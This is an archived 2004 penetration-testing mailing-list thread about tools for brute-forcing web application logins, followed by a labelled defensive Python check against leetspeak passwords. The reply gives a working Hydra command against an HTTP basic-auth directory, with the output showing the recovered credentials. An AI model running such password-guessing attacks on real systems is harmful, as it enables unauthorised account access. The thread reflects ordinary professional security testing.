RE: brute force tools

From: Robert E. Lee (robert@dyadsecurity.com)
Date: Fri May 21 2004 - 11:50:15 EDT


Don,

I have had good luck with the 4.0 version of hydra. It's not 100%
intuitive, but it does work somewhat reliably once you get used to it.

For this demo I made a file called passlist that had 5 lines
(username:a, :aa, usename:aaa, foo:aaaa, bar:aaaaa). I set up a
htpasswd/htaccess pair that had username username and password a.

root:/var/tmp/hydra-4.0# hydra -l username -C ./passlist \
www.domain.com http /dir -s 80
Hydra v4.0 (c) 2004 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2004-05-21 08:27:24
[DATA] 5 parallel tasks, 1 servers, 5 login tries (l:1/p:5), ~1 tries per task
[DATA] attacking service www on port 80
[STATUS] attack finished for www.domain.com
[80][www] host: 333.333.333.333 login: username password: a
Hydra (http://www.thc.org) finished at 2004-05-21 08:27:25

With the -C option you set up a file that has the following syntax:
Username:password

I believe you may be able to get away with:
:password

I didn't see a good permuting option from the command line, but I'm sure
you could whip something up to play with your dictionary file prior to
use by hydra.

Best of luck :).

Robert

-----Original Message-----
From: don.williams@verizonwireless.com
[mailto:don.williams@verizonwireless.com]
Sent: Thursday, May 20, 2004 4:34 PM
To: pen-test@securityfocus.com
Subject: brute force tools

Frequently I attempt to brute force web applications and have found a
few problems with the programs I have used. For instance, Brutus always
informs me of a few successful attempts, yet when I try them they fail. (2)
Webcrack not reliable.

What I would like is some other tools you may have used with good
success and hopefully a Perl-based script which enumerates common words,
substituting letters for numbers as users do every day (i.e. pa$$w0rd).
Also, when attempting to crack ColdFusion, it only requests the password, not
the user name / password combo as most tools only allow. Windows or
Linux is fine.

Thx
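
The thread notes that users swap look-alike characters into common words (pa$$w0rd). As an added example that is not part of the original messages, here is a defender-side check that rejects such passwords when they are set, by undoing the substitutions and comparing against a deny-list; the substitution table, the constructed word list and the function names are assumptions made for illustration.

```python
import itertools

# Constructed sample deny-list (assumption); a real deployment would load a
# large list of common passwords instead.
COMMON_WORDS = {"password", "letmein", "welcome", "admin", "coldfusion"}

# Assumed substitution table: each look-alike character maps to the letters
# it commonly stands in for. Ambiguous ones ("1", "!") map to several.
LEET = {"0": "o", "1": "il", "3": "e", "4": "a", "5": "s", "7": "t",
        "$": "s", "@": "a", "!": "il", "+": "t"}

MAX_LENGTH = 64         # longer inputs are left to other policy checks
MAX_CANDIDATES = 4096   # bound the expansion of ambiguous characters


def deleet_candidates(text):
    """Yield each reading of `text` with look-alike characters mapped
    back to letters; ambiguous characters expand into every option."""
    choices = [LEET.get(ch, ch) for ch in text]
    readings = itertools.product(*choices)
    for combo in itertools.islice(readings, MAX_CANDIDATES):
        yield "".join(combo)


def is_weak(password, words=COMMON_WORDS):
    """Return True if the password is a deny-listed word once character
    substitutions and a trailing run of digits/punctuation are undone."""
    pw = password.lower()
    if len(pw) > MAX_LENGTH:
        return False
    while True:
        if any(cand in words for cand in deleet_candidates(pw)):
            return True
        if not pw or pw[-1].isalpha():
            return False
        pw = pw[:-1]  # drop one trailing non-letter and re-check


if __name__ == "__main__":
    for sample in ["pa$$w0rd", "P@55w0rd!", "Password123", "tr0ub4dor&3x"]:
        print(sample, "->", "reject" if is_weak(sample) else "accept")
```

Run at password-set time, a check like this closes off the candidates a dictionary-based guessing run tries first.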


